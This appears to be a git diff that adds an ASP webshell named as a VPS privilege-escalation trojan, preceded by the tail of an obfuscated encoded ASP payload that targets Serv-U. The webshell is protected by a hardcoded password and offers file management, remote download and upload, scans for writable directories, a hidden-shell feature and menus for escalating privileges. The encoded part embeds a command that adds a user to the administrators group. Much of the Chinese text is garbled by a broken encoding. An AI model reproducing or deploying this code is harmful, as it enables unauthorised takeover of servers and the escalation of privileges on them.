'8EPLP-4;DJW,[PrRImYkKd/DNbYx!E~LP-4;.S6P'~rOp;GDl/EM.xO{!rP[,\(/Dd0~[,JR}!WYm\lXk:!hx!rPLP-4/.d0~[,m@#@&P~~,PP~~rO\lbUD+Umx1+'UXkO+sJ~[,\8/MS0,'PrOnmddhKD9Kzwnx"+LE^CDrP'~74Z.J6P'PrR"lObWk'1KxEPLP-4;DJW,[Pr~b1m+kdxm=-'u])\AS/fhEPLP-8;DSW@#@&;;kD~{PE5j&KJ,[,-4;DJ0@#@&UnSE/.'M+w^C^+vxh;/n.BJ^)rS0*@#@&dV+^O,mC/~UjC1YbWx@#@&1C/Pq@#@&/nO,l'UnD7+Dc/.+mYr8Ln^D`EHb^DK/GWDR(\J_KPnrb@#@&CcWa+x,JV3Kr~~J4YO2=zz8+Gc!RZ q)rPLP2W.O,[~JJLW^Nd;	zE2C9:rxJd8JS:D!+~,JrSPrJ@#@&mRdn	NP^GobxEkn.PLP^WLkU2m/dPL~:DP'~9+V[Gslrx,',xnSNK:lbx,'P	+AEk+.~LP;!rY@#@&/O~//kkGxcEmJb'm@#@&NJ@!WKD:~hY4W9xEwGkYEPxm:xBTWsNkEUv@*J@#@&%J@!kxa;OP	ls+xB;v,YzwxB4k[[xB~r9'vEE~7ls!+{BJLEknDLJv@*@!zO[@*J@#@&%J@!kxa;OP	ls+xB2v,YzwxB4k[[xB~r9'vwE~7ls!+{BJLwmd/LJv@*@!zO[@*J@#@&%J@!kxa;OP	ls+xB2GMYvPDzw'v4bNNnUEPrN{vaW.DB,\l^ExBr[2WMY'EE@*@!JON@*J@#@&%E@!bxaEOPUCs+xB1vPDX2n{Btr[9+UB,r9'v1B,\l^ExBr[^:9[Ev,/k.n'E*!E@*E@#@&Lr@!rx2;DPUlsn'E0v~DXwnxEtrN9n	B~bN{B0EP7CV!+xBr[W'rBPkry'BlTv@*r@#@&LE@!rUaEOP	C:'vj`lmOrKxvPDza+xEtbNNxE~k9'v?`l^ObWxE~\mVExv E@*@!zWW.h@*J@#@&NE@!km.raYPsC	o;lTn{B%m\m/mMkaOB@*J@#@&NJ[G1E:UYchDbOn`E@!1+UYn.@*��������Pq F !c! q=J[2GMY'JBʹ���û���l,J'!/D[r~���r'wm/d[rR  @!m+	O+M@*B*IE@#@&Lr/nYPrs+GEDcB9W^;s+xO mVsRTG^Nd!xc/E(:bO`*iv~W!TT*iJ@#@&Lr@!zk^.kaY@*J@#@&^Ck+~ @#@&/Y~8{?+.-D ZMnmYn}4N+mD`r\k1DG/K0O oHS_PKhJ#@#@&8RKwx~J!3:JSPr4YDwl&JF { ZRTR8lrP',0DwwKDD~[,J&oKV[d!xz!2l9:k	&d r~,K.EnS,JE~,EJ@#@&8 k+x[~rjd+M~TWE,[,\4;DdWPLPEwm/d~KNJ,'P74ZMJWPLPr/rYn~6nm,EPLP^h9P[~-(Z.S6~LP5!kD@#@&k+D~//dkKxcE(J#{8@#@&LJ@!WGDsPs+OtG[{B2WkOB,xCh'BLG^NdE	v@*J@#@&Lr@!k	w!OP	lh+{B;v,YXan'Etk9[nxEPbNxB;v,\CV!n'EJ';k+D'EE@*@!zD[@*J@#@&Lr@!k	w!OP	lh+{B2v,YXan'Etk9[nxEPbNxB2v,\CV!n'EJ'2m//'EE@*@!zD[@*J@#@&Lr@!k	w!OP	lh+{B2GMYB,OXa+'E4rN9+	B~k[xEwGDDvP7ls;'BE'aW.YLEE@*@!JY9@*J@#@&NE@!bx2EDPUCs+'E^B,YXanxB4k9Nnxv~bNxB1vP7ls;'BE'1:[[rv,/r.+{B*ZB@*E@#@&LE@!bx2;DPxmh+{B0E~OXa+{B4k[[xvPb['E0v~7lV;n{BE[6'rB~kk.+'E*Zv@*r@#@&Lr@!rUaEY,Uls+'Ejil1YbWUB~OHwn'E4k9NnUEPk[xE?il1ObWUEP7lV!+{v&E@*@!z6W.h@*J@#@&%J@!/mMr2Y,VmxLECL'vLm-lkm.raYB@*E@#@&%J9G1EhxDRhMkDn`E@!^+	Yn.@*��������Ȩ��~��ȴ�Rc ~@!m+	OnD@*B*iE@#@&%r/nY:r:W;OvJJ[G1Eh+	Ocls^RTWV9/!URkE8:bYcbpJJB*!Z!#pE@#@&NJ@!zdm.raY@*J@#@&mm/n~2@#@&dnDP^'UnM\nMR;D+mY64N+^YvJ\r1DWkG0DR(tJuK:nr#@#@&C Kwnx,EMAKES,JtOOa)&z8+FRTc!cF)rPL~wKDOPLPE&TWV9dE	zEaC[:bxJ/fJS~:D;+B~Jr~~Er@#@&C k+UN,sKor	Ek+D,[,sWTkUwm/d~LP:D~[,N+^[G:mk	P'P5;bY@#@&knY,/ndkkWUcrlE#{C@#@&%r@!1+xD+M@*��Ȩ���~��ִ�������@!4.@*@!0GUDPmKsWM'D[@*JLmsN'J@!&6WUY@*@!4M@*@!8M@*J@#@&NJ@!k	2!Y~DXa+'(EDOW	P-l^EnxEP���ؼ���PE~W	ZVb^V'rJ^W^lOrKx tMn0{B_)1YkGU{?nD7;EiEr@*r@#@&NJ@!&mxO+M@*E@#@&mlknPV/@#@&W	PD.W.~M+dEsnP	+aO@#@&/nO,lx/dkkG	`rlJ*@#@&d+DP8'k+ddbWxvE4r#@#@&dnY,m{/n/drKxcJ1E#@#@&C m4W.O@#@&j+D~mPx,1KYtbxT@#@&(RC4KDO@#@&?+D~4,'PgGOtbxT@#@&m C(W.Y@#@&?Y~^,'PHGDtrxT@#@&LE@!mxYD@*@!0KDhPs+O4KN'E2WkYB,UC:'EoGV[d!xv@*r@#@&NJ@!Om4Vn~Sk[Y4xEc1WB,t+bo4O'EF&EP8GMN+MxB8BP1nsVal9NrxLxE!vP1nV^/2C1kxLxEFvP(GMNnMmKVWM'E:v+vv+B@*E@#@&Lr@!YMPl^rLx{B1+UYn.EP-l^ro	'vhbNNsnE@*E@#@&%r@!O9P1WVkwmU'E v@*U+.- jP����Ȩ��,8X,?ls@!&Y9@*r@#@&LE@!JY.@*r@#@&NJ@!OMPlsrTxxB1n	YnMB,\l^kTU'E:rN9Vnv@*J@#@&%J@!YN,ArNDt{Bq!Tv@*�û���)@!zD[@*r@#@&%r@!Y[~Sk[Y4xE&{OB@*@!k	w!OP	lh+{B;v,YXan'EY+XOvPbN{B;B~-mV;+{vSKmCszN:rUb/ODmOKDv@*@!JYN@*J@#@&Lr@!&YM@*E@#@&LJ@!OD,lVbLU'EmxO+.v,\CVbLx{Bhr9NVnv@*J@#@&NE@!Y[@*��P�@!zY9@*r@#@&NJ@!Y9@*@!r	wED~xm:+{v2B,YHwn'vO6OB,rN{B2v,\ls;'va^@$flV[R^3iZ@$hv@*@!zON@*J@#@&NJ@!JOD@*J@#@&%E@!DD,lskLU{B^+	O+MB~-mVkLU{Bhk9[^+v@*J@#@&Lr@!D[@*��,�ڣ�@!&Y9@*E@#@&LJ@!ON@*@!k	2;Y,xm:n'v2KDOB,OXa+xvD+6Ov,k['E2KDOEP7lV!+{vc2,X%E@*@!&DN@*r@#@&NJ@!JO.@*r@#@&LE@!O.,lskTU'EmnUD+Dv~7lskTU{BhbN9V+E@*r@#@&NJ@!Y9@*ϵͳ·����@!&DN@*r@#@&NJP@!O[@*@!k	w;Y~Um:n'EWB,Yz2'BOnXYvPb[{BWEP7lV!+{vJL0'JEPdr.+'E0B@*@!zD[@*J@#@&NJ~@!&OM@*E@#@&%J,@!O.,lVrL	'vmUD+.EP7lVbo	xBsk[N^+v@*r@#@&NEP@!YN@*�����@!&Y9@*r@#@&LE~@!Y[@*@!rxaEO~	l:nxEmvPDza+xEY6YEPb['EmvP7ls;'B1hN,zm,UnY,Ek+.PC[skU^,q 2cX,zl[[,[~xO,VG1l^oDKEa~l9:rxb/O.mYWMdPmN:bUyPJl9NvPdr.+xBlTB@*@!&O9@*J@#@&NJ~@!JOM@*E@#@&NJP@!YM~l^kLx{B^n	Y+MvP7lVbLU'E:bN[Vnv@*J@#@&NEP@!Y[~1WVd2mxxByv@*@!r	w!YPDXan'E/;4skOv,xlsn'E?E(hrYEP7lsEnxE�ύB@*Pr@#@&NJ@!r	wEO~DX2+{vM+dYEPxm:xBUE8:bY+v,\l^;+{B����B@*E@#@&NJ@!kUw;O,xC:xBUjC^DkWUv,YzwxEtr9NxB,k9xBmmOkKxv~7lV!n'EFB@*@!&Y9@*r@#@&LE@!JY.@*@!&Ym4sn@*@!zWGM:@*@!J^xOD@*J@#@&+	[Pk+s+1Y@#@&6Ex1OkKxPV2CY4`*@#@&WU~D.WM~D/;hPxnaD@#@&+M.cmslM@#@&k+D~0{?nD7+. ;D+mO+}4L^O`r?1DrwOr	o sbs+UXdO:r8%mOJ*@#@&kW,+MDR	Es8+M@*TPDtnU@#@&oaCY4'J1lE@#@&+XkOPW;	mOkKU@#@&+U[,k0@#@&TwCY4x6R!YUw+1kmssKV[+M`Tb@#@&oaCY4'V1Cd+vV0O`L2mY4~yb#@#@&dnDP0xUKY4k	L@#@&n	N,0E	mDrW	@#@&mm/nEtHfrlHtf`*@#@&mm/J]+C["2!J=^l^V~]lN]3V`b@#@&^m/nr?4Wh8sbs+r)j+DP)$;'1APdAs=)$Zc?4WAFor^+c?d/bWUcrsWs[DKlD4r#b=?YPzA;x1KY4k	o@#@&1l/EfKhxwrs+r)GWAxor^+~sgC:)j4Kh2..v#@#@&1Ck+EG+^sk^+rl?Y~b~ZxHhPd$s=bA; 9+^sbVn`oHm:n#=j+DP)$;'1GO4kUo@#@&1ldJANkDsbs+r)j+DP)$;'1APdAs=)$Zc29kOsrs`o1mh+*)jnDPb$/{1GY4r	o@#@&mm/+rZK2Xwks+r)jnDPb~/'g+h,J$s=b~Z ZG2HsrVcsglhn*)?nO,b$Z{HKY4bxT@#@&1lknJtW-+wksnr)?OPzAZ{Hnh,S~slb$/cHG\ok^+cogl:nb=?nY,)~ZxgWDtk	o@#@&mm/nJG+soKVN.J=?+D~)A;'g+APJ$w))A; fVoG^N+.cw1C:b=?nDPzAZ{1KOtbxL@#@&mCdJZK2XwWV9n.J=?Y~b$/{1nh,JAw))$;RZG2HsGV9nM`ogls+#=?OPzA/'gWO4bxo@#@&mm/+r\G\sKV[+.E=?nY,)A;'HnSPS$o=b$Zc\K\nwW^N+M`wHls+b)U+O~zAZ{HWDtk	L@#@&1lk+E1nAwWsN.J=?nO,bA/xg+APd$w))~Zc1+SsKsNDcsglhn*)?OPzAZ{HGY4k	o@#@&^Ck+Ejaok^+El`wsrs`b@#@&^m/nrKU+lMm4E):?nlMm4c*@#@&1C/Jw1CUXStDncElamCxHAtDn*v#@#@&^m/nJ;h9Fj4+^VJ=Zs[FUtnV^`b@#@&mlknJdWoK;OJ=?/dkGUcZGxDnxD/ ]:W-nvJV30E*)]/aWxk+c]+9k.+1Y~i"S@#@&^lk+J;G;Dk+r)/W;.k+c#@#@&mm/nEzV+aCr))Vam`b@#@&1l/Jk;0DwE)kEWOa`#@#@&mm/+r;2VKl9JlE2sKl[`*@#@&1ldnrDl[hbxE)MC9:r	`*@#@&1lknJamCxHh4nM+crlw1lxHA4+M+W`b@#@&^m/nJTG4mmVE=oW8C13c#@#@&;ldPrnDKsbs+r)KDKsrs`#@#@&mm/+r24wr)at2`b@#@&mC/ElaL[n^J)C2NNnVvb@#@&^m/JmsNXE)1:[6v#@#@&1l/Elkw6rlC/a6v#@#@&^Ck+ENKAx^WC[kJ)[GSxsWm[k`b@#@&1l/J4rN9+U/4+ssr)tb[Nx/4nsVv#@#@&^ldnr?^l	9Db\noKD:E~=PjmmUGDr7+wWDs@#@&^lk+E?1lU9Mk\EP=P?1CUfMk7+~In5!+dYvEfMk-nr#@#@&^m/nJU^wWs9+MJP,),jmwWsND~];EdYvJsKs[+MJ*@#@&P~/m/nPAs/P\CbxsG.s`b@#@&3	N~U+^+mD@#@&r0,b^YbWU@!@*J?.\!JPD4nx,?4WA2..v#@#@&NE@!J4G[H@*@!&4D:s@*r~L8pqAA==^#~@
+%>
+
diff --git a/asp/vps提权马.asp b/asp/vps提权马.asp
new file mode 100644
index 0000000..1eaa412
--- /dev/null
+++ b/asp/vps提权马.asp
@@ -0,0 +1,1295 @@
+<%
+UserPass="icesword"'	����
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+On Error Resume Next
+'------------------------�ڲ����� ��----------------------
+mmname   ="�����������Ȩ����" 'shell����
+mmshell ="��������ʹ" 'shell��Ȩ
+errout ="���������,��Ҫ��" '���������ʾ
+serversoft=Request.ServerVariables("server_software")
+'-------------------------------------------
+
+response.write ""+vbCrLf+""+vbCrLf+""
+
+Response.Buffer = True
+Server.ScriptTimeOut=999999999
+  
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+
+
+'��·������ \ 
+function GetFullPath(path)
+	GetFullPath = path
+	if Right(path,1) <> "\" then GetFullPath = path&"\" '����ַ������ \ �ľͼ���
+end function
+
+'ɾ���ļ�
+Function Deltextfile(filepath)
+ On Error Resume Next
+ Set objFSO = CreateObject(CONST_FSO) 
+  if objFSO.FileExists(filepath) then '����ļ��Ƿ���� 
+   objFSO.DeleteFile(filepath) 
+  end if 
+ Set objFSO = nothing
+ Deltextfile = Err.Number '���ش����� 
+End Function 
+
+
+'���Ŀ¼�Ƿ��д 0 Ϊ�ɶ�д 1Ϊ��д������ɾ��
+Function CheckDirIsOKWrite(DirStr)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	filepath = GetFullPath(DirStr)&fso.GettempName
+	FSO.CreateTextFile(filepath) 
+	CheckDirIsOKWrite = Err.Number '���ش����� 
+	if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
+		Response.Write "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
+	end if
+	set fout =Nothing
+	set FSO = Nothing
+	Deltextfile(filepath) 'ɾ����
+	if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+
+'����ļ��Ƿ�����޸�(�˷������޸�����,���ܻ��е㲻׼������������)
+function CheckFileWrite(filepath)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)	
+	set getAtt=FSO.GetFile(filepath)
+	getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+	set FSO = Nothing
+	set getAtt = Nothing  
+end function
+
+'���Ŀ¼�Ŀɶ�д��
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	B = FSO.FolderExists(Path)
+	set FSO=nothing
+	
+  '�Ƿ�Ϊ��ʱĿ¼���Ƿ�Ҫ���
+  IS_TEMP_DIR =	(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+  		
+	if B=false then '�������Ŀ¼�ͽ����ļ����
+	'==========================================================================
+		Re = CheckFileWrite(Path) '����Ƿ��д
+		if Re =0 then
+			Response.Write "[�ļ�]<font color=red>"&Path&"</font><br>"
+			b =true
+			exit function
+		else
+			Response.Write "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"						
+			exit function
+		end if	
+	'==========================================================================	
+	end if
+	
+
+	
+	Path = GetFullPath(Path) '�� \	
+	
+	re = CheckDirIsOKWrite(Path) '��ǰĿ¼Ҳ���һ��
+	if (re =0) or (re=1) then
+		Response.Write "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+	end if
+
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+
+
+
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+'======================================
+for each file in f.Files
+	Re = CheckFileWrite(Path&file.name) '����Ƿ��д
+	if Re =0 then
+		Response.Write "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+		b =true
+	else
+		if ShowNoWriteDir then Response.Write "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"			
+	end if
+next
+if b then response.Flush '��������ݾ�ˢ�¿ͻ�����ʾ
+'======================================
+end if
+
+
+
+'============= Ŀ¼��� ================
+for each file in f.SubFolders
+if CheckNextDir=false then '�Ƿ�����һ��Ŀ¼
+	re = CheckDirIsOKWrite(Path&file.name)
+	if (re =0) or (re=1) then
+		Response.Write "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+	end if
+end if
+	
+	if (CheckNextDir=True) and (IS_TEMP_DIR=false) then '�Ƿ�����һ��Ŀ¼
+			ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir '�ټ����һ��Ŀ¼
+	end if
+next
+'======================================
+Set FSO = Nothing
+set f = Nothing
+end function
+
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub"
+Sub RRS(str):response.write(str):End Sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S):RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action"):Pos=2
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+Serveru=request.servervariables("http_host")&url
+FolderPath=Request("FolderPath"):
+Pn=pos*44:FName=Request("FName"):pso=5:BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"--Soft - "&serversoft&"</title>"
+RRS ""&copyurl&""
+rrS"<style type=""text/css"">"
+rrs"body,td,center,label{font-size: 12px;background-color:#383838; color:#00ff00;SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #008000; SCROLLBAR-SHADOW-COLOR: #008000; SCROLLBAR-3DLIGHT-COLOR: #00FF00; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000}"
+rrs"input,select,textarea{BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #383838; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000}"
+rrs"hr{color:#00ff00}"
+rrs".C{background-color:#000;border:0px}"
+rrs".cmd{background-color:#000;color:#FFF}"
+rrs"body{margin: 0px;margin-left:4px;}"
+rrs"BODY{color:#383838}"
+rrs"a{color:#008000;text-decoration: none;}a:hover{color:#00ff00;background:#000}"
+rrs".am{color:#888;font-size:12px;}"
+rrs"</style>"
+rRs"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽ�X"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL�����������5</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<tr>X��<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>2E��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>n#��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\`��ʼe�˵�\\����\\"")'>����</a>ib��<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\a��ʼp�˵�\\����\\����"")'>����</a>ib��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>LM��<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>Dv��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\"")'><font color=red>~���ⳣд~</font></a>:����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>IJ��<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>ED��<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>WP��<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>eF<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>m?<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>v,<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>7"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanDriveForm' target='FileFrame'>����дĿ¼</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸�Ȩ��</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����ش���</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq1' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq2' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq3' target='FileFrame'><font color=red>��N��������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq4' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq5' target='FileFrame'><font color=red>��ɨĿ¼��д��D��</a></font><hr></td></tr>"
